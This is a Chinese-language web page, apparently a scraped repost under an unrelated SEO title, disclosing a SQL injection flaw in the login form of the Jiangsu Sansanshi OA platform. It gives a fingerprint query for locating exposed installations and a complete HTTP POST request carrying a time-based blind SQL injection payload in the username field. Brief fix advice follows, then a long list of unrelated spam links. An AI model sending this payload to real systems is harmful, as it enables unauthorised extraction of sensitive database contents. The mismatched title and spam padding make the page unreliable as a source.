当前位置: 首页 > news >正文

企业网站怎么自适应谷歌官网下载

企业网站怎么自适应,谷歌官网下载,wordpress秀恩爱,美国亚马逊官网0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁…

0x01 漏洞介绍


江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响版本

  1. 江苏叁拾叁-OA

0x03 语法特征

  1. app="江苏叁拾叁-OA"

0x04 漏洞复现


页面
 


POC(payload sqlmap梭哈来的)

POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin


直接sqlmap梭哈来
 


0x05 漏洞修复建议

  1. 使用参数化查询
  2. 对用户输入进行验证和过滤
  3. 限制数据库账户权限
  4. 更新和打补丁
http://www.zhongyajixie.com/news/66281.html

相关文章:

  • 做网站跟做APP哪个容易全自动引流推广软件免费
  • 在线制作动画网站西安网络优化大的公司
  • 雄安做网站公司赤峰seo
  • 网站开发教学视频百度怎么推广自己的视频
  • wordpress网站网页加密云南最新消息
  • 利用淘宝联盟做网站搜索引擎营销的方法不包括
  • 什么做网站推广百度广告联盟网站
  • 做装修网站好赚钱吗百度云客服人工电话
  • 编程 网站建设福州关键词优化平台
  • 邯郸专业网站建设公司软文推广做得比较好的推广平台
  • 网站调用时间创建个人网站的流程
  • 企业网站制作公司河南网站公司
  • 网站备案图片营销软件
  • 没有后台的网站怎么做排名山东工艺美术学院网站建设公司
  • 新网站制作平台专业郑州企业网站建设
  • 漂流瓶说自己是做网站的网络营销比较成功的企业
  • 服装网站建设公司推荐网站建站价格
  • 阿里云ecs部署网站指数查询
  • 南京建设局网站首页加速游戏流畅的软件
  • 微信公众号的微网站怎么做的软文推广怎么写
  • 给网站增加功能怎么做美食软文300范例
  • 建网站挣钱 优帮云优化网络的软件下载
  • 盐城做网站的价格搜狐新闻手机网
  • 怎么用自己的网站做网页关键词是什么意思
  • 代做毕业设计网站多少钱手机百度seo快速排名
  • 代刷网站只做软件杭州网站优化方案
  • 恩施网站开发网站建设开发公司
  • 广东专业网站建设公司西点培训班一般要多少学费
  • phpwind做的网站江苏建站
  • 南京市建委网站下载中心建设工程招标html友情链接代码